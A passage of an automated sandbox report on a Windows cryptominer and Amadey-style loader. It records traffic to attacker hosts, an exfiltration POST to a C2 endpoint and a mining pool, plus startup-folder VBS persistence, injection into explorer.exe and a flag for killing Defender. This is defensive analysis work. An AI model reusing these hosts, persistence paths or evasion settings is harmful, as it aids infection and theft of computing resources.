                Source: explorer.exe, 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                Source: explorer.exe, 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                Source: explorer.exe, 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                Source: explorer.exe, 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: explorer.exe, 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.2235805876.0000026B59C35000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.2235805876.0000026B59C35000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmp

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 154.216.20.243:443 -> 192.168.2.5:49705
                Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.5:49707 -> 154.216.20.243:443
                Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.5:49835 -> 154.216.20.243:443
                Source: C:\Windows\explorer.exeNetwork Connect: 154.216.20.243 443Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 37.203.243.102 3333Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 192.168.0.100 4444Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 37.203.243.102:3333
                Source: Joe Sandbox ViewIP Address: 154.216.20.243 154.216.20.243
                Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.5:64047 -> 1.1.1.1:53
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /P.txt HTTP/1.1Accept: */*Connection: closeHost: woo097878781.winUser-Agent: cpp-httplib/0.12.6
                Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
                Source: global trafficDNS traffic detected: DNS query: woo097878781.win
                Source: unknownHTTP traffic detected: POST /66/api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 326Content-Type: application/jsonHost: woo097878781.winUser-Agent: cpp-httplib/0.12.6
                Source: powershell.exe, 00000002.00000002.2194011814.000001FAAF571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000002.00000002.2171532533.000001FA9F728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: WindosCPUsystem.exe, 00000009.00000002.2754655191.00000227AACEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                Source: powershell.exe, 00000002.00000002.2171532533.000001FA9F728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: file.exe, 00000000.00000002.2201146076.0000026B4888C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2171532533.000001FA9F501000.00000004.00000800.00020000.00000000.sdmp, WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000002.00000002.2171532533.000001FA9F728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000002.00000002.2171532533.000001FA9F728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.2171532533.000001FA9F501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000002.00000002.2194011814.000001FAAF571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000002.00000002.2194011814.000001FAAF571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000002.00000002.2194011814.000001FAAF571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000002.00000002.2171532533.000001FA9F728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: powershell.exe, 00000002.00000002.2194011814.000001FAAF571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: file.exe, 00000000.00000002.2201146076.0000026B4888C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmp, WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810935675.0000000001311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win
                Source: explorer.exe, 00000006.00000002.3378093722.0000000001286000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270125052.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251273544.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2242645098.0000000001309000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810935675.0000000001311000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3378093722.0000000001249000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2996970093.0000000001311000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832239989.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php
                Source: explorer.exe, 00000006.00000002.3378093722.0000000001249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpProvider
                Source: explorer.exe, 00000006.00000003.2270800960.00000000012DA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txt
                Source: explorer.exe, 00000006.00000002.3378093722.0000000001286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txt--cinit-kill-targets=MsMpEng.exe--cinit-api=https://woo097878781.win/6
                Source: explorer.exe, 00000006.00000003.2237726271.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270125052.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2479254183.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832441496.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270800960.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251671714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2996719613.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2236864354.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3378093722.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251273544.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811156999.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832239989.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txtEMP
                Source: explorer.exe, 00000006.00000003.2237726271.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2479254183.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832441496.00000000012EB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2263312897.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251671714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270800960.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2996719613.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3378093722.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2270125052.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3251273544.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832239989.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txtZ
                Source: explorer.exe, 00000006.00000003.2810758230.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2810935675.0000000001311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.winxe
                Source: explorer.exe, 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835

                System Summary

                barindex
                Source: 6.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 6.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 6.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: Process Memory Space: explorer.exe PID: 6760, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Local\Temp\orupcopicsyv.sysJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF8490C31F20_2_00007FF8490C31F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF8490CCC430_2_00007FF8490CCC43
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF8490C0DF20_2_00007FF8490C0DF2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF8490C2EFA0_2_00007FF8490C2EFA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FE2E112_2_00007FF848FE2E11
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeCode function: 9_2_00007FF8490D31F29_2_00007FF8490D31F2
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeCode function: 9_2_00007FF8490DCC439_2_00007FF8490DCC43
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeCode function: 9_2_00007FF8490D0DF29_2_00007FF8490D0DF2
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeCode function: 9_2_00007FF8490D2EFA9_2_00007FF8490D2EFA
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\orupcopicsyv.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                Source: WindosCPUsystem.exe.0.drStatic PE information: No import functions for PE file found
                Source: file.exeStatic PE information: No import functions for PE file found
                Source: file.exe, 00000000.00000002.2200013862.0000026B47020000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
                Source: file.exe, 00000000.00000000.2113202547.0000026B46C7E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKaebftg.exe0 vs file.exe
                Source: file.exe, 00000000.00000002.2235805876.0000026B59C35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
                Source: 6.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 6.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 6.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: Process Memory Space: explorer.exe PID: 6760, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: file.exe, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: file.exe, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: file.exe, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: WindosCPUsystem.exe.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: WindosCPUsystem.exe.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: WindosCPUsystem.exe.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: 0.2.file.exe.26b59c356f8.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.expl.evad.mine.winEXE@14/9@2/3
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbsJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12fieoef.n4o.ps1Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: file.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 23%
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
